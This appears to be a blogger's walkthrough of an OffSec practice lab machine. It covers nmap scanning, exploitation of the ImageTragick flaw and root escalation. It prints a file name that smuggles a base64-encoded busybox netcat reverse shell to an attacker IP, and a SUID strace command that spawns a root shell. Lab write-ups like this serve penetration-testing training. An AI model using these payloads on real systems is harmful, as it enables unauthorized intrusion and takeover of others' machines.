image
00 min
2025-3-27
Source
https://portal.offsec.com/labs/practice
Date
Mar 23, 2025 → Mar 23, 2025
Tag
Nmap
Privilege Escalation Techniques
Web Exploitation

192.168.140.178

Nmap

└─# nmap -sT -p- --min-rate 5000 $ip
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-23 05:57 EDT Nmap scan report for 192.168.140.178 Host is up (0.070s latency). Not shown: 65533 closed tcp ports (conn-refused) PORT STATE SERVICE 22/tcp open ssh 80/tcp open http
Nmap done: 1 IP address (1 host up) scanned in 14.37 seconds
└─# nmap -sU -p- --min-rate 5000 $ip
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-23 05:57 EDT Warning: 192.168.140.178 giving up on port because retransmission cap hit (10). Nmap scan report for 192.168.140.178 Host is up (0.066s latency). All 65535 scanned ports on 192.168.140.178 are in ignored states. Not shown: 65385 open|filtered udp ports (no-response), 150 closed udp ports (port-unreach)
Nmap done: 1 IP address (1 host up) scanned in 144.92 seconds

80

notion image
notion image
nothing found via brute force
notion image
we found a script could be used
but it is a metasploit, so we need to know how this vulnerability works via below link
ImageTragick
There are multiple vulnerabilities in ImageMagick, a package commonly used by web services to process images. One of the vulnerabilities can lead to remote code execution (RCE) if you process user submitted images. The exploit for this vulnerability is being used in the wild.
ImageTragick
https://imagetragick.com/
simple to say, we need to name an image which include | and it will run the command after |
cp pngegg.png '|abc"echo YnVzeWJveCBuYyAxOTIuMTY4LjQ1LjE3NSA0NDQ0IC1lIC9iaW4vYmFzaA== | base64 -d | bash".jpg'
notion image
notion image
into that machine

PE

we need to check strace binary to see if any SUID bit in it.
use ls -alh /usr/bin/strace
notion image
strace -o /dev/null /bin/sh -p
notion image
got it
 
上一篇
HB
下一篇
AZ-900